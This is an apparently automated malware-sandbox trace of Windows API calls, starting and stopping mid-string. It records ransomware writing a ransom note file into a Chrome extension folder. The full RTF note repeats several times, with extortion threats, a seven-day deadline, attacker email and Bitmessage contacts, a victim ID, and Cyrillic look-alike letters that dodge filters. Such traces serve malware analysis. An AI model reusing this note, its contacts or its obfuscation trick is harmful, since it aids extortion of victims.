EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248aaf8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\n¯óÈgÑãHÐ\x09K¨?ìc¥àÛ©ü\x0c¥ñs\x01", lpUsedDefaultChar=0x0) returned 8717 [0284.536] WriteFile (in: hFile=0x228, lpBuffer=0x248aaf8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248aaf8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0284.541] CloseHandle (hObject=0x228) returned 1 [0284.541] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\#readme_eman#.rtf")) returned 0xffffffff [0284.541] GetLastError () returned 0x2 [0284.541] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0284.542] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.542] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of 